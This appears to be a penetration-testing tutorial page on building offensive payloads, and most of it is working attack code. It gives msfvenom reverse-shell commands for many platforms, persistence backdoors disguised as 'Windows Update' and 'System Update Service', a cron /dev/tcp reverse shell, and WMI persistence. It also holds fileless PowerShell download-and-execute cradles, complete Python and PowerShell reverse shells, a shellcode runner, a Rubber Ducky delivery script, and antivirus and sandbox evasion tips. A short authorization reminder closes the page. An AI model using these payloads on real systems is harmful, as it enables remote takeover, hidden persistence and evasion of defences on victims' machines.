Payload Development

Creating and customizing payloads for various exploitation scenarios

Payload Types & Classifications

Staged vs Stageless Payloads

Staged Payloads
Small initial payload, downloads larger payload
Stageless Payloads
Complete payload in one package
Staged Payloads:
  • Small initial payload
  • Downloads larger payload
  • Better for size-constrained environments
  • Example: windows/meterpreter/reverse_tcp
Stageless Payloads:
  • Complete payload in one package
  • Larger size but more reliable
  • Better for unstable networks
  • Example: windows/meterpreter_reverse_tcp

Payload Formats

Executable Formats

# Windows executable msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o payload.exe
# Linux executable msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o payload.elf
# Mac executable msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f macho -o payload.macho

Script Formats

# PowerShell msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f psh -o payload.ps1
# Python msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.py
# Bash msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.sh

Web Formats

# PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.php
# ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f asp -o payload.asp
# JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.jsp

Advanced Payload Generation

Encoded Payloads

# x86 shikata_ga_nai encoder msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
# x64 encoder msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x64/xor -i 3 -f exe -o encoded64.exe
# Multiple encoders msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -e x86/countdown -i 3 -f exe -o multi_encoded.exe

Custom Templates

# Using custom template msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -x /path/to/template.exe -f exe -o templated.exe
# Keeping template functionality msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -x /path/to/template.exe -k -f exe -o templated_keep.exe

Platform-Specific Payloads

Windows Payloads

# Meterpreter reverse TCP msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o meterpreter.exe
# Meterpreter bind TCP msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o bind_meterpreter.exe
# Shell reverse TCP msfvenom -p windows/shell/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe
# PowerShell reverse msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o powershell_reverse.exe
# Add user payload msfvenom -p windows/adduser USER=hacker PASS=Password123 -f exe -o adduser.exe

Linux Payloads

# Meterpreter reverse TCP msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o meterpreter.elf
# Shell reverse TCP msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf
# Bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f elf -o bind_shell.elf

Android Payloads

# Android meterpreter msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -o android_payload.apk

Backdoor Payloads

Persistent Backdoors

Windows Registry Backdoor

# Registry run key msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o backdoor.exe
# Add registry persistence reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Public\backdoor.exe"

Linux Cron Job Backdoor

# Cron job persistence echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'" | crontab -
# Systemd service persistence cat > /etc/systemd/system/backdoor.service << EOF [Unit] Description=System Update Service After=network.target [Service] Type=simple ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' Restart=always [Install] WantedBy=multi-user.target EOF systemctl enable backdoor.service systemctl start backdoor.service

Fileless Payloads

PowerShell Fileless

# Base64 encoded PowerShell payload $payload = "IEX ((new-object net.webclient).downloadstring('http://10.10.10.10/payload.ps1'))" $encoded = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payload)) powershell.exe -nop -w hidden -e $encoded

WMI Persistence

# WMI event subscription wmic /namespace:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" wmic /namespace:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\backdoor.exe", CommandLineTemplate="C:\Windows\System32\backdoor.exe" wmic /namespace:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""

Payload Obfuscation Techniques

Encoding Methods

Base64 Encoding
Simple encoding for basic obfuscation
XOR Encoding
Bitwise XOR with key for payload hiding
ROT13/Caesar Cipher
Character rotation for text payloads
Hexadecimal Encoding
Converting to hex representation

Encryption Methods

# AES encryption example openssl enc -aes-256-cbc -in payload.exe -out payload.enc -k secretkey # RC4 encryption python rc4_encrypt.py payload.exe secretkey payload.enc

Polymorphic Payloads

Polymorphic Techniques:
  • Dynamic code generation
  • Variable encryption keys
  • Randomized instruction sequences
  • Garbage code insertion
  • Register substitution

Anti-Detection Techniques

Antivirus Evasion

# Multiple encoding iterations msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded_payload.exe # Custom encoding with Veil python /opt/Veil/Veil.py

Sandbox Evasion

# Time-based evasion sleep(300) # Wait 5 minutes before execution # User interaction check if click_detected(): execute_payload() # Environment checks if not is_virtual_machine(): execute_payload()

Behavioral Evasion

Evasion Techniques:
  • Legitimate process injection
  • DLL side-loading
  • Process hollowing
  • LOLBAS (Living Off The Land)
  • Memory-only execution

Custom Payload Development

C/C++ Payloads

#include #include int main() { // Shellcode buffer unsigned char shellcode[] = "\x90\x90\x90\x90"; // Allocate memory LPVOID mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); // Copy shellcode memcpy(mem, shellcode, sizeof(shellcode)); // Execute ((void(*)())mem)(); return 0; }

Python Payloads

import socket import subprocess import os def reverse_shell(host, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) while True: command = s.recv(1024).decode() if command.lower() == 'exit': break try: output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT) s.send(output) except Exception as e: s.send(str(e).encode()) s.close() if __name__ == "__main__": reverse_shell("10.10.10.10", 4444)

PowerShell Payloads

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close()

Payload Delivery Methods

Web-Based Delivery

# HTTP download and execute powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/payload.ps1')" # Encoded web delivery powershell -enc

Email Delivery

Macro-Enabled Documents
Office documents with malicious macros
PDF Exploits
Malicious PDF documents
Archive Files
Password-protected archives with payloads

USB/Physical Delivery

# Rubber Ducky script DELAY 2000 GUI r DELAY 500 STRING powershell -windowstyle hidden -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/payload.ps1')" ENTER

Payload Testing and Validation

Sandbox Testing

Testing Environments:
  • Isolated virtual machines
  • Containerized environments
  • Cloud-based sandboxes
  • Physical air-gapped systems

Antivirus Testing

# Test against multiple AV engines # VirusTotal API curl -X POST 'https://www.virustotal.com/vtapi/v2/file/scan' -F 'key=YOUR_API_KEY' -F 'file=@payload.exe' # NoDistribute.com (private scanning) # Upload payloads for private AV testing

Functionality Testing

# Test payload execution ./payload.exe # Verify network connections netstat -an | grep 4444 # Check process creation ps aux | grep payload

Legal and Ethical Considerations

Important Legal Reminders:
  • Only create and use payloads on authorized systems
  • Ensure proper scope and rules of engagement
  • Document all payload usage and impact
  • Remove payloads and persistence after testing
  • Protect payload code and prevent unauthorized use
  • Report findings through proper channels

Responsible Disclosure

Best Practices:
  • Clean up all payloads after testing
  • Document exploitation methods clearly
  • Provide remediation guidance
  • Maintain confidentiality of vulnerabilities
  • Follow coordinated disclosure timelines